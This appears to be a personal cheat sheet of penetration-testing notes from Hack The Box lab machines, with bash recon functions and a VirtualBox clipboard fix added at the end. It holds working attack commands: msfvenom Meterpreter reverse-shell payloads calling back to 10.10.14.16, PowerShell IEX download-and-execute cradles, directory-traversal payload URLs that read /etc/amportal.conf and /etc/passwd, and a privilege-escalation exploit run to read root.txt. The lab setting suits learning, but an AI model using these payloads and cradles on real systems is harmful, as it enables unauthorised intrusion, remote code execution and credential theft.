My Technical record related to penetration testing, HTB ,...

 

1.      Ctrl+Shift+R  - reverse search – search from history in Linux terminal

2.     Tmux  -  tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window

 

3.      nmap -sV -O -F --version-light 10.10.10.4

a.      -sV: Probe open ports to determine service/version info

b.      -O: Enable OS detection

c.       -F: Fast mode - Scan fewer ports than the default scan

d.      --version-light: Limit to most likely probes (intensity 2)

e.      10.10.10.4: IP address of the Legacy box

 

4.     Check for a exploit on a shell opened machine: Required for Privilege Escalation:

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

 

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter.

 

5.      Search for a file in rce system:

è search -f user.txt

6.  Create Exploit using msfvenom:

àmsfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx   LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-0: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload a file (by put/upload/download by python server)

Start listening on multi/handler and then run the uploaded exploit on victim machine – it will create session

 

7.  Check for FTP service by NMAp à

è nmap -A -p21 -v 10.10.10.5

8.  Elastix login portal à is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling.

 

Available exploit for Elastix - 2.0 - 'graph.php' Local File Inclusion

Payload à https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9.  SSH connect à ssh root@10.10.10.7

10. Get details of exploit by searchploit à  searchsploit -x 18770.txt

11. In case of OpenSSL in exploit – can be set proxy à set proxies http:127.0.0.1:8080

12.   Default Worldlist path of Dirbuster à /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13.   Vtiger vulnerable version – 5.4.0 – RCE/CSRF/LFI  à searchsploit vtiger,

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00

14.   nmap script to get more things from that rpcbind    à nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15.   Mount a backup if any unmounted site backup available à sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16.   Strart Apache service à systemctl start apache2

17.   NMAP - 80/tcp open  http    HttpFileServer httpd 2.3  -

Exploit -Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) 

 

18. SET payload for 64 bit system - set payload windows/x64/meterpreter/reverse_tcp

19.   Privilege escalation – in windows 2012 r2 – exploit – MS16-098 – 41020.exe

àC:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

à C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

àC:\Users\Administrator\Desktop>type root.txt

20.   Command to take data in clipbord à Cat abc.txt |xclip   

21.   Run a server in kali on port 8000àPython -m SimpleHTTPServer 

22.   Run on victim machine to download the file à powershell “IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')”

23.   msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24.   powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25.   If METERPRETER running, check the running process à ps

26.   Migrate on any running processes à migrate process_ID.

27.   Unset a set value in Metasploit à unset parameter

28.   Ncat -lvnp 4444 à allies l-listen, v-verbos, n- don’t do dns, p-port

29.   If get user session on target machine, now need to move with admin previleges -> migrate to a stable session in window ->  3004  580   davcdata.exe       x86   0        NT  AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

 à migrate 3004

30.   A exploit in windows 2003 r2 for admin privileges escalation --windows/local/ms14_070_tcpip_ioctl

...

Recon for a security bug by automation - .bash_script - Automation tool

Run the command by automation –

Dirsearch(){

Python3 ~/tools/dirsearch/dirsearch.py -u $1 -t  $2 -e $3

}           #u =url, t= no. of , e- extension 

Bash Program – For automation:

è Nano auto.sh

for domain in ‘crtsh $1’; do

echo $domain | tee -a /Desktop/Recon/$1_22-6-2020.txt

curl -I -s $domain | tee /Path/Recon/curlout/$domain_22-6-2020.txt

done

Webfuzzing for critical file and directory   -à nano autoWebFuzz.sh

for domain in ‘crtsh $1’; do

echo $domain | tee -a /Desktop/Recon/$1_22-6-2020.txt

wfuzz -c -z file,/Path/Payloads/DirSrc_CritFile.txt --sc 200 http://$domain/FUZZ | tee /Desktop/Recon/WebFuzzFileDirout/$domain_22-6-2020.txt

done

certspotter(){

curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1

} #h/t Michiel Prins

crtsh(){

curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

}

dirsearch(){ #runs dirsearch and takes host and extension as arguments

python3 /Path/tool/dirsearch/dirsearch.py -u $1 -e $2 -t 50 -b

}

certnmap(){

curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1  | nmap -T5 -Pn -sS -i - -$

}

ipinfo(){

curl http://ipinfo.io/$1

}

crtshdirsearch(){ #gets all domains from crtsh, runs httprobe and then dir bruteforcers

curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httprobe -c 50 | grep https | xargs -n1 -I{} dirsearch -u {} -e $2 -t 50 -b

}

s3ls(){

aws s3 ls s3://$1

}

s3cp(){

aws s3 cp $2 s3://$1

}

Make a permanent tool:

  sudo nano /bin/crtsh

  curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

sudo chmod +x /bin/crtsh

nano .profile    -  remove crtsh from here

source .profile

Reference -  https://github.com/nahamsec/recon_profile/blob/master/.bash_profile

Clipboard Stopped working in Virtual Box Kali Linux: Display Screen Size in Virtual Box:

Clipboard Stopped working in Virtual Box Kali Linux:

The used to happen if guest ISO version is getting mismatch with respect to virtual box version or extension pack version. if you are trying to update and upgrade then this used to happen of version mismatch. 

Solution: Bring all three on same version. If updating virtual box with the latest version. Make sure update the extension pack on the same version. Next - update the guest addition ISO on the same version from Device Tab -> Insert Guest additions CD images(If it is already there then first login to  kali and removed cd image added as unmount) -> then install

Installation process - > chmod  +x VBoxLinuxAddition.run

and then -> sudo ./VBoxLinuxAdditions.run

and finally -> sudo reboot

This will solve the clipbord problem 

.

Guest addition ISO is also used for solving the screen size issue in virtual box. Without it, screen size is not working properly.